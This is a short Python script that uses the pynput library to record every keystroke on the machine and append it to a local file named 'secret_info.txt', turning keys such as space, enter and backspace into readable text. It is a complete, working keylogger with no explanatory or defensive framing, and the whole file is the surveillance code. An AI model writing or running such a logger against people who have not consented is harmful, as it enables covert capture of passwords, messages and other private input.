import pynput
from pynput.keyboard import Listener

log_file = 'secret_info.txt'

def on_press(key):
    try:
        key = str(key).replace("'", '')


        if key == 'Key.space':
            key = ' '
        elif key == 'Key.enter':
            key = "\n"
        elif key == 'Key.backspace':
            key = '[BACKSPACE]'
        elif key == 'Key.ctrl':
            key = '[CTRL]'
        elif key == 'Key.esc':
            key = '[ESC]'
        elif key == 'Key.shift':
            key = ''

        with open(log_file, 'a')as f:
            f.write(key)
    except Exception as e:
        print(f'Error: {e}')

listener = Listener(on_press=on_press)
listener.start()
listener.join()
